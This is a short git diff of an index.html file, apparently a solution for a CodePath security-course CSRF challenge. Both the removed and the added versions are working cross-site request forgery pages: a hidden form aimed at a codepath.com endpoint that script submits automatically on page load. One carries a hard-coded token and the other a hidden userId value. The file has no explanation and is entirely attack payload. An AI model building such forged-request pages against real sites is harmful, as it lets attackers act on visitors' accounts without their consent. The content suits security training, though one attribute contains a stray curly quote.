--- a/index.html
+++ b/index.html
@@ -1,7 +1,6 @@
-<form name="csrfForm" action="https://flags.codepath.com/http/public/protected/flags/csrf_09/" method="POST">
-   <input type="hidden" firstname="" />
-   <input type="hidden" lastname="" />
-   <input type="hidden" csfrtoken="95f9f7a45623b00e98f333b9d1039fea" />
-   <input type="submit" />
+<form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
+   <input type="hidden" name="userId" 
+value=“0da0417b6bb930e2382ff25c3551f89fdf22a336" />
+   <input type="submit"/>
 </form>
 <script> document.csrfForm.submit(); </script>
